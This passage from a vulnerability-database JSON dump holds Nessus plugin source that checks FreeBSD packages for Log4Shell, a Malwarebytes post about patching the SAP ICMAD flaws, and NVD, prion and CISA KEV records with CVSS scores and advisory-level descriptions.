https://vuxml.freebsd.org/freebsd/515df85a-5cd7-11ec-a16d-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6147fb22\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bastillion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'bastillion<3.10.00_1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:13", "description": "A remote code execution vulnerability exists in MobileIron Core in the bundled Apache Log4j logging library.\nApache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "nessus", "title": "MobileIron Core Log4Shell Direct Check (CVE-2021-44228)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:mobileiron:mobileiron_core"], "id": "MOBILEIRON_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156941", "sourceData": "Binary data mobileiron_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:40", "description": "A remote code execution vulnerability exists in VMWare vRealize Operations Manager in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156932", "sourceData": "Binary data vmware_vrealize_operations_manager_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:27:14", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-18T00:00:00", "type": "nessus", "title": "FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:openhab", "p-cpe:/a:freebsd:freebsd:openhab2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/159065", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159065);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q\");\n # https://github.com/openhab/openhab-distro/security/advisories/GHSA-j99j-qp89-pcfq\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e4b243\");\n # https://github.com/ops4j/org.ops4j.pax.logging/security/advisories/GHSA-xxfh-x98p-j8fr\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03d2b934\");\n # https://vuxml.freebsd.org/freebsd/93a1c9a7-5bef-11ec-a47a-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c452b373\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'openhab2>=3.0<3.1.1',\n 'openhab2<=2.5.12',\n 'openhab>=3.0<3.1.1',\n 'openhab<=2.5.12'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-02-14T11:27:09", "description": "German enterprise software maker SAP has patched three critical vulnerabilities affecting Internet Communication Manager (ICM), a core component of SAP business applications. Customers are urged by both [SAP](<https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/>) and [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing>) to address these critical vulnerabilities as soon as possible.\n\nOn February 8, SAP released 14 new security notes and security researchers from Onapsis, in coordination with SAP, released a [Threat Report](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities>) describing SAP ICM critical vulnerabilities, [CVE-2022-22536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22536>), [CVE-2022-22532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22532>), and [CVE-2022-22533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22533>). Onapsis also provides an [open source tool](<https://github.com/Onapsis/onapsis_icmad_scanner>) to identify if a system is vulnerable and needs to be patched.\n\n## CVE-2022-22536\n\nThe most important vulnerability in this report is CVE-2022-22536, one of the ICMAD vulnerabilities. The ICMAD vulnerabilities are particularly critical because the issues exist by default in the SAP Internet Communication Manager (ICM). The ICM is one of the most important components of a SAP NetWeaver application server and is present in most SAP products. It is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet.\n\nCVE-2022-22536 is a request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher. This vulnerability scored a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) rating of 10 out of 10. The high score is easy to explain. A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation of the vulnerability.\n\n## Other vulnerabilities\n\nSome of the other \u201chigh scorers\u201d are [Log4j](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) related vulnerabilities, and a security update for the browser control Google Chromium delivered with SAP Business Client. The other two ICMAD vulnerabilities identified as CVE-2022-22532 and CVE-2022-22533 received scores of 8.1 and 7.5, respectively.\n\n## Scan tool\n\nOn [GitHub](<https://github.com/Onapsis/onapsis_icmad_scanner>) Onapsis published a Python script that can be used to check if a SAP system is affected by CVE-2022-22536.\n\nA [Shodan scan](<https://www.shodan.io/search?query=server%3A+SAP+NetWeaver+Application+Server>) shows there are more than 5,000 SAP NetWeaver servers currently connected to the Internet and exposed to attacks until the patch is applied.\n\n## Mitigation\n\nSAP and Onapsis are currently unaware of any customer breaches that relate to these vulnerabilities, but strongly advise impacted organizations to immediately apply Security Note 3123396 (which covers CVE-2022-22536) to their affected SAP applications as soon as possible.\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) warned that customers who fail to do so will be exposing themselves to ransomware attacks, the theft of sensitive data, financial fraud, and disruption or halt of business operations.\n\nThe post [SAP customers are urged to patch critical vulnerabilities in multiple products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/sap-customers-are-urged-to-patch-critical-vulnerabilities-in-multiple-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T08:58:36", "type": "malwarebytes", "title": "SAP customers are urged to patch critical vulnerabilities in multiple products", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22532", "CVE-2021-22533", "CVE-2021-22536", "CVE-2022-22532", "CVE-2022-22533", "CVE-2022-22536"], "modified": "2022-02-10T08:58:36", "id": "MALWAREBYTES:A40F87C53D5487E9D81FB6A8F62AF633", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/sap-customers-are-urged-to-patch-critical-vulnerabilities-in-multiple-products/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-20T23:24:45", "description": "In SAP NetWeaver Application Server Java - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, an unauthenticated attacker could submit a crafted HTTP server request which triggers improper shared memory buffer handling. This could allow the malicious payload to be executed and hence execute functions that could be impersonating the victim or even steal the victim's logon session.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T23:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22532"], "modified": "2022-09-30T13:20:00", "id": "PRION:CVE-2022-22532", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22532", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:24:47", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T23:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2023-09-27T15:15:00", "id": "PRION:CVE-2022-22536", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-20T23:24:45", "description": "Due to improper error handling in SAP NetWeaver Application Server Java - versions KRNL64NUC 7.22, 7.22EXT, 7.49, KRNL64UC, 7.22, 7.22EXT, 7.49, 7.53, KERNEL 7.22, 7.49, 7.53, an attacker could submit multiple HTTP server requests resulting in errors, such that it consumes the memory buffer. This could result in system shutdown rendering the system unavailable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T23:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22533"], "modified": "2022-10-27T01:09:00", "id": "PRION:CVE-2022-22533", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-22533", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cisa_kev": [{"lastseen": "2023-12-06T16:20:37", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server and SAP Web Dispatcher allow HTTP request smuggling. An unauthenticated attacker can prepend a victim's request with arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary Web caches.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-18T00:00:00", "type": "cisa_kev", "title": "SAP Multiple Products HTTP Request Smuggling Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2022-08-18T00:00:00", "id": "CISA-KEV-CVE-2022-22536", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:20:37", "description": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa_kev", "title": "Apache Log4j2 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T00:00:00", "id": "CISA-KEV-CVE-2021-44228", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-06T15:08:47", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T23:15:00", "type": "cve", "title": "CVE-2022-22536", "cwe": ["CWE-444"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2023-09-27T15:15:00", "cpe": ["cpe:/a:sap:netweaver_application_server_abap:7.22", "cpe:/a:sap:netweaver_application_server_abap:7.86", "cpe:/a:sap:web_dispatcher:7.49", "cpe:/a:sap:netweaver_application_server_abap:8.04", "cpe:/a:sap:netweaver_application_server_abap:krnl64uc_7.49", "cpe:/a:sap:content_server:7.53", "cpe:/a:sap:netweaver_application_server_abap:krnl64nuc_7.22", "cpe:/a:sap:web_dispatcher:7.53", "cpe:/a:sap:netweaver_application_server_abap:7.81", "cpe:/a:sap:web_dispatcher:7.85", "cpe:/a:sap:netweaver_application_server_abap:krnl64nuc_7.22ext", "cpe:/a:sap:netweaver_application_server_abap:7.49", "cpe:/a:sap:netweaver_application_server_abap:krnl64nuc_7.49", "cpe:/a:sap:netweaver_application_server_abap:krnl64uc_7.22", "cpe:/a:sap:web_dispatcher:7.86", "cpe:/a:sap:netweaver_application_server_abap:7.77", "cpe:/a:sap:web_dispatcher:7.77", "cpe:/a:sap:web_dispatcher:7.22ext", "cpe:/a:sap:netweaver_application_server_abap:7.53", 